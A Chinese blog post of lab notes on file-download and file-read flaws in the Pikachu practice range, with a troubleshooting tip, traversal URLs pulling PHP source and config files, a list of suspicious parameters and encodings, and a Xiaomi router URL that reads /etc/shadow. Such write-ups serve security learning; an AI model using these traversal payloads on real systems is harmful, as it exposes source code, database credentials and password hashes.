首页 > 其他分享 >6.1文件下载、读取

6.1文件下载、读取

时间:2024-06-01 19:43:47浏览次数:20  
标签:文件 读取 .. filename 6.1 php 下载 pikaqu

文件下载验证(靶场pikaqu)


靶场报错:mysqli_connect(): (HY000/1045)

解决办法:修改数据库文件密码与本地mysql密码一致;
/WWW/pikachu/inc/config.php和/WWW/pikachu /pkxss/inc/inc/config.php

之后访问http://www.pikaqu:81/install.php重新配置即可

1、文件下载得到文件地址如下;

下载地址为http://www.pikaqu:81/vul/unsafedownload/execdownload.php?filename=ai.png

图片地址为http://www.pikaqu:81/vul/unsafedownload/download/ai.png

2、反推下载php文件地址为

http://www.pikaqu:81/vul/unsafedownload/download/execdownload.php

3、下载改php需跳到前一级目录,则为unsafedownload下

`http://www.pikaqu:81/vul/unsafedownload/execdownload.php?filename=../execdownload.php``

4、下载到文件之后,通过对以下载到php文件代码进一步分析,进行进一步文件下载路径探测;

下载根目录下inc/function.php文件;

http://www.pikaqu:81/vul/unsafedownload/execdownload.php?filename=../../../inc/function.php

5、探测数据库或敏感文件地址

  • 扫描工具或扫描地址(目录扫描探测,字典大
  • 下载好代码分析和文件包含获取

6、使用大字典进行目录探测数据库配置文件,config.inc.php

如何判断含义文件下载功能点

1、判断参数值

read.xxx?filename=
down.xxx?filename=
readfile.xxx?filename=
downfile.xxx?filename=
../ ..\ ./ .\
%00 ?%23 %20等
&readpath= &filepath=   &path= &url=  &data= &readfile=

2、java中web.xml/WEB-INF文件

文件读取

思路:任意文件代码读取;

小米路由器任意文件读取

http://x.x.x/api-third-party/download/extdisks../etc/shadow
即可下载到

标签:文件,读取,..,filename,6.1,php,下载,pikaqu
From: https://www.cnblogs.com/lusang/p/18226304

相关文章

  • 解决OpenCV读取目标图像,cv2.imshow出现闪退的问题
    前言本文是该专栏的第17篇,后面将持续分享OpenCV计算机视觉的干货知识,记得关注。最近有粉丝朋友询问到OpenCV读取目标图像出现的一个问题,在基于python语言“使用OpenCV读取目标图像的时候,利用cv2.imshow函数出现闪退”的情况。而本文,笔者将详细介绍针对上述问题,给出一个详......
  • sensitive-word 敏感词 v0.16.1 新特性支持字典内存资源释放
    敏感词系列sensitive-word-admin敏感词控台v1.2.0版本开源sensitive-word-adminv1.3.0发布如何支持分布式部署?01-开源敏感词工具入门使用02-如何实现一个敏感词工具?违禁词实现思路梳理03-敏感词之StopWord停止词优化与特殊符号04-敏感词之字典瘦身05-敏感词之DFA......
  • CentOS Linux 8x 错误:为仓库 ‘appstream‘ 下载元数据失败 : Cannot prepare interna
    问题描述今天安装CentOS8.5安装完之后,准备更新源仓库环境的时候突然出现错误:为仓库'appstream'下载元数据失败:Cannotprepareinternalmirrorlist:NoURLsinmirrorlist,后面我找了好久没发现有解决这个问题的方法,后面无意看到了https://www.cnblogs.com/cainiaoaixuexi......
  • 『手撕Vue-CLI』获取下载目录
    开篇在上一篇文章中,简单的对Nue-CLI的代码通过函数柯里化优化了一下,这一次来实现一个获取下载目录的功能。背景在Nue-CLI中,我现在实现的是create指令,这个指令本质就是首先拿到模板名称和版本号之后,然后去进行下载对应的模板,关于下载那么肯定要面临的问题就是如何下载?下......
  • 总结常用9种下载(限速、多线程加速、ZIP、导Excel)
    一、前言下载文件在我们项目很常见,有下载视频、文件、图片、附件、导出Excel、导出Zip压缩文件等等,这里我对常见的下载做个简单的总结,主要有文件下载、限速下载、多文件打包下载、URL文件打包下载、Excel导出下载、Excel批量导出Zip包下载、多线程加速下载。二、搭建SpringBoo......
  • VALL-EX下载介绍:只需3秒录音,即可克隆你的声音
    VALL-EX是一个强大和创新的多语言文本转语音模型,支持对中文、英文和日语的语音进行合成和克隆,使用者只需上传一段3-10秒的录音,就可以生成高质量的目标音频,同时保留了说话人的声音、情感和声学环境VALL-EX的应用范围非常广泛,可以用于跨语言文本到语音、语音合成和语音到语音翻译......
  • VALL-EX下载介绍:只需3秒录音,即可克隆你的声音
    VALL-EX是一个强大和创新的多语言文本转语音模型,支持对中文、英文和日语的语音进行合成和克隆,使用者只需上传一段3-10秒的录音,就可以生成高质量的目标音频,同时保留了说话人的声音、情感和声学环境VALL-EX的应用范围非常广泛,可以用于跨语言文本到语音、语音合成和语音到语音翻......
  • 谷歌浏览器114之前、124、125、126版本驱动下载
    114之前版本下载链接在这里   https://chromedriver.chromium.org/downloads ​​​​​​124以后版本下载链接在此   https://googlechromelabs.github.io/chrome-for-testing/#canary只有后面status是绿色对勾的才可以下载,驱动大版本一致就可以使用,不需版本号一模一......
  • Navicat Premium 16.01 下载、安装教程
    NavicatPremium16下载与安装教程目录NavicatPremium16下载与安装教程前言安装步骤同意协议选择安装目录桌面快捷方式安装正在安装安装完成步骤下载方式前言数据库管理用Navicat更加方便,可视化效果更好,今天给大家带来2022NavicatPremium16.1最新安装,亲测有......
  • 记一次读取halcon二维码模型文件的报错
    C#中使用的halcon的dll版本为17.12二维码模型是通过halcon软件保存的,halcon软件版本为20.05.前后使用的halcon版本不一致,导致程序中读取模型一直报错“HALCONerror#8860:Invalidheaderin2ddatacodemodelfileinoperatorread_data_code_2d_model”  ChatG......